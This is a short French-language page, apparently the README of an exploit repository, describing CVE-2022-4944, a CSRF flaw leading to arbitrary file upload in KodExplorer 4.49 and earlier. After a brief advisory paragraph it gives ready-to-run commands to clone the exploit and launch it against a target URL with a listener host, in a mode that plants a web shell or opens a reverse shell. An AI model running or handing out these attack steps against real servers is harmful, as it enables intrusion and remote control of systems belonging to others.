
「💥」CVE-2022-4944: KodExplorer <= 4.49 - CSRF vers téléchargement arbitraire de fichier

Une vulnérabilité, classée comme problématique, a été trouvée dans kalcaddle KodExplorer jusqu'à la version 4.49. Cela affecte une partie inconnue. La manipulation conduit à une falsification de requête inter-sites. Cette vulnérabilité est identifiée de manière unique sous le nom CVE-2022-4944. Il est possible d'initier l'attaque à distance. De plus, un exploit est disponible. Il est recommandé de mettre à niveau le composant affecté.

pip install requests
git clone https://github.com/Brosck/CVE-2022-4944.git
cd CVE-2022-4944
python3 CVE-2022-4944.py -u http://TARGET.TLD/KODExplorer -lh LOCALHOST -m MODE # webshell/reverse mode